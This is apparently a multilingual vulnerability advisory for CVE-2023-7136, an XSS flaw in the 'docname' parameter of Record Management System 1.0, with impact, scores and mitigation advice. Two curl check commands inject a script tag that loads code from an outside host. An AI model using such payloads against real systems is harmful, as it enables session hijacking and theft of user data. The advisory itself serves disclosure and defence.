平台
php
组件
cves
修复版本
1.0.1
CVE-2023-7136 is a problematic cross-site scripting (XSS) vulnerability identified in Record Management System version 1.0. This vulnerability allows attackers to inject malicious scripts into the application, potentially compromising user sessions and data. The affected component is the Document Type Handler, specifically the /main/doctype.php file. A fix is available in version 1.0.1.
An attacker can exploit this XSS vulnerability by manipulating the 'docname' argument within the Document Type Handler. By injecting malicious JavaScript code through this parameter, the attacker can execute arbitrary code within the context of the user's browser. This could lead to session hijacking, defacement of the application, or the theft of sensitive information, such as user credentials or personal data. The impact is amplified if the application handles sensitive data or is used in a critical business process. Successful exploitation could allow an attacker to gain unauthorized access to the Record Management System and potentially compromise the entire system.
This vulnerability has been publicly disclosed and a proof-of-concept may be available. The exploit involves injecting a script tag directly into the 'docname' parameter. The vulnerability was published on 2023-12-28. The CVSS score is 2.4 (LOW), indicating a relatively low probability of exploitation in a standard environment, but the potential impact can be significant if exploited successfully.
Organizations using Record Management System version 1.0 are at risk. This includes businesses relying on this system for document storage and retrieval, particularly those with limited security expertise or those who have not implemented robust input validation practices. Shared hosting environments where multiple users share the same server instance are also at increased risk.
• generic web:
curl -s -X POST "http://your-record-management-system/main/doctype.php?docname=><script src='https://js.rip/b23tmbxf49'></script>" | grep -i script• generic web:
curl -I "http://your-record-management-system/main/doctype.php?docname=><script src='https://js.rip/b23tmbxf49'></script>" | grep -i scriptdisclosure
patch
漏洞利用状态
EPSS
0.13% (33% 百分位)
CVSS 向量
The primary mitigation for CVE-2023-7136 is to upgrade to Record Management System version 1.0.1, which contains the necessary fix. If upgrading immediately is not feasible, consider implementing input validation and sanitization on the 'docname' parameter to prevent the injection of malicious scripts. Web application firewalls (WAFs) configured to detect and block XSS payloads can also provide a temporary layer of protection. Regularly review and update input validation routines to prevent similar vulnerabilities from arising in the future.
Actualizar a una versión parcheada del software. Si no hay una versión disponible, sanitizar las entradas del usuario en el parámetro 'docname' en el archivo '/main/doctype.php' para evitar la ejecución de código JavaScript malicioso. Implementar validación y codificación de salida para prevenir ataques XSS.
漏洞分析和关键警报直接发送到您的邮箱。
CVE-2023-7136 is a cross-site scripting (XSS) vulnerability in Record Management System version 1.0, allowing attackers to inject malicious scripts via the 'docname' parameter.
If you are using Record Management System version 1.0, you are potentially affected by this vulnerability. Upgrade to version 1.0.1 to mitigate the risk.
The recommended fix is to upgrade to Record Management System version 1.0.1. As a temporary workaround, implement input validation and sanitization on the 'docname' parameter.
While active exploitation is not confirmed, the vulnerability has been publicly disclosed and a proof-of-concept may be available, increasing the risk of exploitation.
Refer to the vendor's official advisory for Record Management System, which should detail the vulnerability and provide instructions for remediation.